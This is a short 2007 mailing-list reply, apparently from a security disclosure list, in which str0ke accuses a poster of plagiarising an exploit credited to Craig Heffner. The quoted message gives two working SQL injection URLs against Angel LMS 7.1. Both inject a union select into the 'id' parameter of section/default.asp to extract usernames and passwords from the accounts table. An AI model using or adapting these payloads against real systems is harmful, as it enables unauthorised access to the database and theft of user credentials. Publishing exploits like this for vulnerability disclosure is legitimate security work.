# Credit: # Exploit discovered by Craig Heffner # heffnercj [at] gmail.com # http://www.craigheffner.com http://www.milw0rm.com/exploits/3390 Plagiarism sucks. /str0ke On 1 Mar 2007 16:06:06 -0000, Guns@xxxxxxxxx <Guns@xxxxxxxxx> wrote:
# Angel LMS 7.1 Remote SQL Injection # by Guns #All User Accounts# http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20username%20from%20accounts--" #Account Passwords# http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20password%20from%20accounts--"
